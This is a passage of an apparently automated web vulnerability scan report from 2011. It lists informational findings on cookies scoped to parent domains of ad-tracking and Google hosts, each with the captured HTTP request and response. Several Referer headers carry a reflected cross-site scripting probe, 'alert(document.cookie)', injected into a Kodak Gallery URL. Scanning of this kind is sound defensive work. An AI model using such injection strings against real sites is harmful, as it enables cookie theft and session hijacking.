GIF89a.............!.......,........@..D.;

13.61. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=106496&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; uuid2=2724386019227846218; anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e9d8suG-ye>W`#*xcK!F*]r_nQX17ug?D^i4Ky+ws1H^PA<I_`-Q#Y*<ehBjI's<VwXBdk!Xh_p68<#UlNIs$lHoS)KU?p2PVAMKDwwAde<nLrn`=NJ_)CBR+$'SvaGpBe9>V?b=^3-#=_rcP:7MDRMjuZgf]dy-qA:lfQD>k1VS*<Ds-aPb9yos0:7_`KL2>sp=wcr]6AL>hXR2cp2%`KLH2NS#jx2Gh=V_3VeIQA%0I/Uv8Iq/FVL-^:^Yt=MkzKH(_b?QATsp`cWw+RwA4`e2n@VkK#+`lP$1g+U=nfMjZBZb3t*sQ@@uHAAx4WY)_#Il$_69Vq6jFB`mUbt/S8Xx8ASZ437T1-cV_7`w+y9$*`+wM[17-_ub?we+(DDC4J@z/ut=k`m6^Qd@[2sk[?bFKeU9I^pkvg^!oSy>*J7L-b3qEZuVr8aM^c-J4vh@z9)cYyg2iGB(Pn/OOu`Dt+[PiUt?PxChdN*ytjRT`mDsI1r!9d_>B`h+oNWxE7cOltt7UL$Pe0<yY!)B9

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 01-May-2011 15:08:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Fri, 29-Jul-2011 15:08:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Fri, 29-Jul-2011 15:08:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5`$gj[2<?0P(*AuB-u**g1:XIExTEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e9d8suG-ye>W`#*xcK!F*]r_nQX17ug?D^i4Ky+ws1H^PA<I_`-Q#Y*<ehBjI's<VwXBdk!Xh_p68<#UlNIs$lHoS)KU?p2PVAMKDwwAde<nLrn`=NJ_)CBR+$'SvaGpBe9>V?b=^3-#=_rcP:7MDRMjuZgf]dy-qA:lfQD>k1VS*<Ds-aPb9yos0:7_`KL2>sp=wcr]6AL>hXR2cp2%`KLH2NS#jx2Gh=V_3VeIQA%0I/Uv8Iq/FVL-^:^Yt=MkzKH(_b?QATsp`cWw+RwA4`e2u+Sf1dkJ(/O%TqOV)xoMVyzChemvcd1Y2:/BWW87sH!wM`S+D3eY!0$qkui.16)FRQ!vH(OPltDQ(PK8jasz8N3mrjAqG=@ahIbqPNSa48B=z5pikEGJC1^tRiGfRO+jVRDKQ>_CNYtt@cX7Mxvu1wqAr_t'dYf)r3]_X+Y5e9kld6tU4iZwp[C-Mo@:9[ns]Nq8sV$[>K:4>wF](16lk<dybJkY<jJzh]#Cx; path=/; expires=Fri, 29-Jul-2011 15:08:28 GMT; domain=.adnxs.com; HttpOnly
Location: http://b.scorecardresearch.com/b?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=&cv=1.3&cj=1
Date: Sat, 30 Apr 2011 15:08:28 GMT
Content-Length: 0


13.62. http://id.google.com/verify/EAAAAJR-W9n_BEIB_zbNgVGlkRI.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAJR-W9n_BEIB_zbNgVGlkRI.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJR-W9n_BEIB_zbNgVGlkRI.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=Hp6W-Y-QxVYUWO8zPHZHtF3uaevt1Ib2pte3eqzyTQ=TlP6Ush6_p3ZWxlu; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=cMOTWQGkXQrk7nh54pMJ1zQ_ycsNxj0VXcwHDPJp-lB7ImooFb9JoLuGI39McEZosntJPHUik-1OWZ3xy9chGAc15L9QJMcDt-OTMQ2hNhjOnw17Fu6WntRqrZ3m-gf4; expires=Sun, 30-Oct-2011 01:20:14 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 30 Apr 2011 01:20:14 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.63. http://id.google.com/verify/EAAAAJjd7InK0_AwgsQIx0lPt28.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAJjd7InK0_AwgsQIx0lPt28.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJjd7InK0_AwgsQIx0lPt28.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=loFDKJhwF9VPfFU71z-B7B4fMRETP0rAefGpTIfeiA=PS9rmUXiuV2C-6RZ; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=Hp6W-Y-QxVYUWO8zPHZHtF3uaevt1Ib2pte3eqzyTQ=TlP6Ush6_p3ZWxlu; expires=Sun, 30-Oct-2011 00:36:39 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 30 Apr 2011 00:36:39 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.64. http://id.google.com/verify/EAAAAMOrTls6merGAfxdZppvi6I.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMOrTls6merGAfxdZppvi6I.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMOrTls6merGAfxdZppvi6I.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=kansas+gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=Hp6W-Y-QxVYUWO8zPHZHtF3uaevt1Ib2pte3eqzyTQ=TlP6Ush6_p3ZWxlu; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=cMOTWQGkXQrk7nh54pMJ1zQ_ycsNxj0VXcwHDPJp-lB7ImooFb9JoLuGI39McEZosntJPHUik-1OWZ3xy9chGAc15L9QJMcDt-OTMQ2hNhjOnw17Fu6WntRqrZ3m-gf4

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=-JX4UvvfkoVdp7CU7QdHY-1skOg0VBxsc1J_mrmcqQ=toOnmohUm9vh7Sky; expires=Sun, 30-Oct-2011 11:12:48 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 30 Apr 2011 11:12:48 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.65. http://id.google.com/verify/EAAAAP-cj6E6L5hPaay4uczj5Ho.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAP-cj6E6L5hPaay4uczj5Ho.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAP-cj6E6L5hPaay4uczj5Ho.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=-JX4UvvfkoVdp7CU7QdHY-1skOg0VBxsc1J_mrmcqQ=toOnmohUm9vh7Sky; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=cMOTWQGkXQrk7nh54pMJ1zQ_ycsNxj0VXcwHDPJp-lB7ImooFb9JoLuGI39McEZosntJPHUik-1OWZ3xy9chGAc15L9QJMcDt-OTMQ2hNhjOnw17Fu6WntRqrZ3m-gf4

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=ikCY0kMSo7y3A3vKF0N2SrMgOWa-QTOO8qXnWZ515Eu-O0Oi5puqvHszoEKeohRmyNEFS1l1m2VhhnxC-COL4-cxA-y-92ci9Cekllcubg71Ev6BJWRdZyw878K9DBOT; expires=Sun, 30-Oct-2011 11:56:05 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 30 Apr 2011 11:56:05 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.66. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4761888b-4251-4912-8743-09bf2fc2ed75 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256; domain=.interclick.com; expires=Fri, 30-Apr-2021 15:10:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 30 Apr 2011 15:10:51 GMT

GIF89a.............!.......,...........D..;

13.67. http://image.providesupport.com/js/hic/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=9k8DdjQMsyWA;Path=/;Domain=.providesupport.com
Content-Length: 4877
Date: Sat, 30 Apr 2011 22:10:03 GMT
Connection: close

var psMygbsid = "9k8DdjQMsyWA";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...

13.68. http://image.providesupport.com/js/hic/safe-textlink.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201813432&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=YoOVBtFsUz6P;Path=/;Domain=.providesupport.com
Content-Length: 4775
Date: Sat, 30 Apr 2011 22:16:31 GMT
Connection: close

var psNjc9sid = "YoOVBtFsUz6P";
// safe-textlink@ie5up.js

var psNjc9iso;
try {
   psNjc9iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psNjc9wid != null);
} catch(e) {
   psNjc9
...[SNIP]...

13.69. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:25 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; domain=pubmatic.com; expires=Mon, 29-Apr-2013 15:08:25 GMT; path=/
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768105; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

13.70. http://kdkgllry.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kdkgllry.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=195 HTTP/1.1
Host: kdkgllry.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CaX1f%2BX%2FH0XmnewULrgjFuBdyNO5Bfd3pDQ5D3BffaKygm7dWhxyfMeptI88DhCWPCMieuKmcL2x7c%2BH19wRjGU6WMC%2Fj5YTTPSS3NzPOIqDufmtYKfD%2Fi7sByDhAGs4OaaGcL4fkM8ToE%2B1SbyyQPiv4JgRuJqgqvzAT0PhUc2Qq%2FA2FuWNxwCQiehpdqupOwMrOGkuNMKcb6Y%2BAaCdn6sjXowEdBlDwqn1M5yyByn0Mo2yD2HaLuUD5MWy4CYKI6X7QwffnTgfB6NG4hGmbw6tDbDL4x7rpuRd4CBCv9vA%3D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:18 GMT
Server: Apache/2.2.9
P3P: policyref="http://kdkgllry.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 28 Apr 2011 15:08:18 GMT
Last-Modified: Thu, 28 Apr 2011 15:08:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=z2r8aytrpwakd%7CCTvIgdEfUb%2F9H0h1IG38d1tn%2BRDKtRvPJHr%2F4JbkUcJaLDzz3yKCVJRWJJZ3OdFCrEUa2%2BL0P3gBIzFh22vC0k4yj17hP8pDj%2BTAfvBIpBoSHiic4MgkNLd9vkgQEVSQZWApasK%2BWaqI5A%2Fa0%2Ba27%2Bl4R7r4AMAWBAv4nPkbYKg7Jup%2Bh9SLxhC5EX8Xs9A1W2%2BYk58LvGr7ybFr1Fv22Lx1%2BprOhpordmXze4uipLrF7jKamjQQMIVdULuDCGjMEidtz9ntZaDzB27ApAMkrnxu0BuWDBMwST1wWX%2BHJpmdilKLYsgFPIgs0U5uwfyDwSmlHQk7f0ZS9h%2BYwqFnSg%3D%3D; expires=Sun, 30-Oct-2011 15:08:18 GMT; path=/; domain=.netmng.com
Content-Length: 1013
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=netmining=global_AOL[72]&betq=9772=414055[72]'; i.width=1; i.height=1; i.border=0; i.vsp
...[SNIP]...

13.71. http://khmdb0.google.com/kh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb0.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=7b7db42a19765bcc:TM=1304166107:LM=1304166107:S=l97zieUqiHpMrL03; expires=Mon, 29-Apr-2013 12:21:47 GMT; path=/; domain=.google.com
Date: Sat, 30 Apr 2011 12:21:47 GMT
Server: btfe
Content-Length: 11790
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

13.72. http://khmdb1.google.com/kh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb1.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=fc2b0c1122371315:TM=1304166108:LM=1304166108:S=Q4xYT8hEf4PEfjAe; expires=Mon, 29-Apr-2013 12:21:48 GMT; path=/; domain=.google.com
Date: Sat, 30 Apr 2011 12:21:48 GMT
Server: btfe
Content-Length: 11790
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

13.73. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5331d115efba8054:TM=1304166134:LM=1304166134:S=3lC6GeKYBlhC1NHB; expires=Mon, 29-Apr-2013 12:22:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

13.74. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.kodakgallery.com
Path:   /b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777?AQB=1&ndh=1&t=30%2F3%2F2011%2010%3A8%3A45%206%20300&ns=kodakimagingnetwork&pageName=landing%20page%3Avisit%20florida&g=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&r=http%3A%2F%2Fburp%2Fshow%2F43&cc=USD&ch=landing%20page&server=www.kodakgallery.com&c1=landing%20page%3Avisit%20florida&h1=landing%20page%3Avisit%20florida&c3=site%20section&c4=burp%20%5Bref%5D%20--%20landing%20page%3Avisit%20florida&c5=700019816903%7Cnull&c7=landing%20page%3Avisit%20florida&c8=landing%20page&v8=landing%20page&c9=visit%20florida&v9=visit%20florida&v11=700019816903%7Cnull&v26=700019816903&v27=D%3Dg&v28=D%3Dg&v33=burp%20%5Bref%5D&c34=burp%20%5Bref%5D&v34=D%3Dc34&v35=D%3Dc34&tnt=25173%3A0%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=998&bh=935&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.kodakgallery.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0BA11A045581BD2C37F3ADAC84642E3F.ecom202_main; sourceId=700019816903; DYN_EMAIL=anon_mem1215451620@kodakgallery.com; bookStartTest1=control; bookUnlockedLayoutTest=lockedLayout; ft_80002=none; abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; mbox=check#true#1304176183|session#1304176122561-938029#1304177983|PC#1304176122561-938029.17#1305385725; s_cc=true; gpv_pn=landing%20page%3Avisit%20florida; wa_cpm=burp%20%5Bref%5D

Response

HTTP/1.1 302 Found
